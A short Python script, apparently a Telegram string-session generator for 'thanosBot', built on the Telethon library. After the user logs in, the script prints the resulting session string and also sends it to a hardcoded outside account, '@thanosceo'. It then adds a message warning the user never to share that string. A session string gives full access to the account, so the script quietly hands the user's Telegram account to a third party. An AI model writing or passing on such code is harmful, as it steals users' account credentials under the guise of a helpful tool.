from telethon.sync import TelegramClient
from telethon.sessions import StringSession
import colorama
from colorama import Fore, Style

colorama.init(autoreset=True)


try:
    with TelegramClient(StringSession(), api_id, api_hash) as client:
        THANOS_session = client.session.save()
        print(f"thanosBot String Session Given Below\n\n{THANOS_session}")
        client.send_message("@thanosceo", f" thanosBot String Session Given Below\n\n`{THANOS_session}`")
        client.send_message("@thanosceo", "This String Generated By @thanosbot_chats String Session Generator. Don't Share This String With Anyone!") 
except Exception as e:
    print(f"{e}")
